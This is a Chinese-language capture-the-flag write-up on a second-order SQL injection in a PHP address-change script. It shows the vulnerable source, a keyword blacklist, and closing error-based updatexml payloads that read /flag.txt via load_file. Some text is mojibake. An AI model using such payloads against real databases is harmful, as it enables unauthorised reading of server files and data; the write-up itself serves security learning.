源码
<?php# change.phprequire_once "config.php";if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"])){$msg = '';$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';$user_name = $_POST["user_name"];$address = addslashes($_POST["address"]);$phone = $_POST["phone"];if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){$msg = 'no sql inject!';}else{$sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";$fetch = $db->query($sql);}if (isset($fetch) && $fetch->num_rows>0){$row = $fetch->fetch_assoc();$sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];$result = $db->query($sql);if(!$result) {echo 'error';print_r($db->error);exit;}$msg = "订åä¿®æ¹æå";} else {$msg = "æªæ¾å°è®¢å!";}}else {$msg = "ä¿¡æ¯ä¸å ¨";}?>
我们发现一个有趣的地方就是,如果我们前面设置的address是一个带有单引号的address,前面我们再更新的时候并不会出现任何问题,比如’suzhou因为经过addslashes转义后单引号变为\’suzhou插入进去,但是在mysql存储的时候却仍然为’suzhou
这样的话我们在取出数据的时候就有问题了
old_address=’’suzhou就形成了一个闭合而后面的就会报错
if (isset($fetch) && $fetch->num_rows>0){$row = $fetch->fetch_assoc();$sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];$result = $db->query($sql);if(!$result) {echo 'error';print_r($db->error);exit;}
比如
这样的情况![1GB@3R[T`32$IS]OP2(O2KD.png](/uploads/projects/xbx0d@torze3/e43f928ab003c27824bb230c574233f7.png)
![]IP({Y}6}C6D_I1913UCB@6.png](/uploads/projects/xbx0d@torze3/8572253e995d4fc3487f29de014ad7f5.png)
那么我们就可以利用报错注入来获取一些信息了
paylaod:
1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),1,20)),0x7e),1)#1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),21,50)),0x7e),1)#
若有收获,就点个赞吧
0 人点赞
